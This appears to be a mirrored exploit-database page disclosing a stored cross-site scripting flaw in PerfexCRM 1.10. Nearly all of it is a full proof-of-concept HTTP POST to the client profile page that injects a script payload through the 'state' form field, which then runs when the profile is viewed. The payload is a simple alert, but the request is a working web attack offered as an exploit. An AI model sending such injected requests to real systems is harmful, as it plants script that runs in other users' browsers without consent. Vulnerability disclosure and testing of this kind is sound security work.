perfexcrm 1.10 state stored crosssite scripting (xss)
▸▸▸ Exploit & Vulnerability >> webapps exploit & multiple vulnerability Code...
 Code...
				
# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) # Date: 05/07/2021 # Exploit Author: Alhasan Abbas (exploit.msf) # Vendor Homepage: https://www.perfexcrm.com/ # Version: 1.10 # Tested on: windows 10 Vunlerable page: /clients/profile POC: ---- POST /clients/profile HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058 Content-Length: 1548 Origin: http://localhost Connection: close Referer: http://localhost/clients/profile Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038 Upgrade-Insecure-Requests: 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile_image"; filename="" Content-Type: application/octet-stream -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="firstname" adfgsg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="lastname" fsdgfdg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="company" test -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="vat" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="phonenumber" -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="country" 105 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="city" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="address" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="zip" 313 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="state" ""><body onload=alert("XSS")>"> -----------------------------325278703021926100783634528058-- then any one open profile page in user the xss its executed
Perfexcrm 1.10 state stored crosssite scripting (xss) Vulnerability / Exploit Source : Perfexcrm 1.10 state stored crosssite scripting (xss)
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes